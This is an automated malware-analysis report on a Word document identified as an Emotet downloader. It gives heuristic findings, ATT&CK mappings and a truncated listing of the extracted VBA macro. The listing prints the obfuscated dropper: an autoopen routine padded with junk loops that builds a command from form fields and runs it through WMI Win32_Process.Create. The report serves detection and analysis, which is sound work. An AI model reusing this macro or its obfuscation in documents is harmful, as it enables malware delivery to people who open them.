MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1137.001 Office Application Startup: VBA
The sample contains a VBA macro with an autoopen subroutine, which is a common execution vector for Emotet. The macro utilizes GetObject and CreateObject to launch the Win32_Process WMI class, indicating an attempt to execute arbitrary code. ClamAV detection further confirms the malicious nature, identifying it as Emotet.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6964795-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6964795-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5074 bytes |
SHA-256: 26506e2ca4143d79f1115c20662d8870e3445acf825ada505799387c7fcca35a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "u7488674"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "r2770191"
Attribute VB_Base = "0{298A0B4D-C405-44A3-A216-69B71817332A}{D3AC5CC8-E14F-4C4D-8BA7-8653A35FE708}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Q75_17"
Attribute VB_Name = "t806__10"
Attribute VB_Name = "B3754251"
Attribute VB_Name = "i76123"
Attribute VB_Name = "k4324924"
Attribute VB_Base = "0{6B6C1F99-9163-46E1-83D7-D013DB63FC2D}{A5F1C39E-103E-4F35-BC8B-9494522B71A3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "J80_503"
Function l01539(t94757)
While m3474080 And Q7393_37
'R0_665n91616F978336v118985
Wend
While a9_7713 And K70079
'P24_3__2b_03835V129519b58155
Wend
Set l01539 = CVar(t94757)
While L80329 And L710777
'f27_2_23i2040240R408164m344886
Wend
While O72170 And h31542
'J_61030h08036_k70_90t59___4_
Wend
While a10516 And M80_2__
'k55257N156_324W__656Q1046_30
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While E__17488 And z2443692
'M787890W647419T4116483z__18_96
Wend
While O84_132 And v020692
'P9250916C605746R479237K283182
Wend
While b863410 And K7058879
'b98658F62963_8d2_71035K_5536_0
Wend
Call v_59872
While C70005 And D5912027
'o_915_w677_47s1531258L_59081
Wend
While f6500_ And b709458
'R10127a335_1V239008i711800_
Wend
While w5059010 And w9432729
'm249253_A53876_7z04089b1588820
Wend
End Sub
Attribute VB_Name = "N2509959"
Function v_59872()
On Error Resume Next
While H519_3 And X34422_
'c7555469m64014B73242m3_00271
Wend
While Z_8727 And Y565_022
'A54464r416228w11395Q66148
Wend
E3_127 = r2770191.i67_851.PasswordChar + k4324924.h458784 + r2770191.i67_851.PasswordChar + k4324924.l68683 + r2770191.i67_851.ControlTipText + r2770191.i67_851.PasswordChar + k4324924.q87773_ + r2770191.i67_851.ControlSource + r2770191.i67_851.ControlTipText + k4324924.m808457 + r2770191.i67_851 + k4324924.N4763858 + r2770191.i67_851.PasswordChar
While m4730184 And N003066
'P84230q092682A64267V187613
Wend
While z574358 And q82550
'a100_63v849_140O8118271f1037970
Wend
Set G_47_76 = l01539(GetObject("winmgmts:W" + "in32_Process"))
While a668672 And c905094
'r9321_P359500l59179O24686
Wend
While A0948871 And n98419
'z0312487V74697U57330i6502028
Wend
G_47_76.Create w968125 + E3_127 + v4129_, I974658, r520692_, i17575
While H91229 And v35958
'X72660P97929__Y5_105j394_865
Wend
While X579__ And q65433
'M0_85227p7_235X6_5542B946364
Wend
While P77627 And z3_7110
'G39491_6N894_9B33173_b3_82807
Wend
End Function
Attribute VB_Name = "k04312_"
Public Function r520692_()
While L013188 And C73__51
'E6382215l51683i889_433P7826762
Wend
While J184521 And X811710
'z07040_w6039766r0_4878Y86793_2
Wend
While C30584 And B1__01
'Y464279a097006V4726145D82142
Wend
Set r520692_ = l01539(GetObject("winmgmts:W" + "in32_ProcessStartup"))
While N_192975 And c7857051
'a0630155H37561D7_1927i09_2_
Wend
While F13687 And F9100321
'B5_592V29194q99919_S9945_
Wend
H865082_ = vbError - vbError
While M137902 And f8720006
'X12207u172525U20574U_7_8508
Wend
While W050805 And J862
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.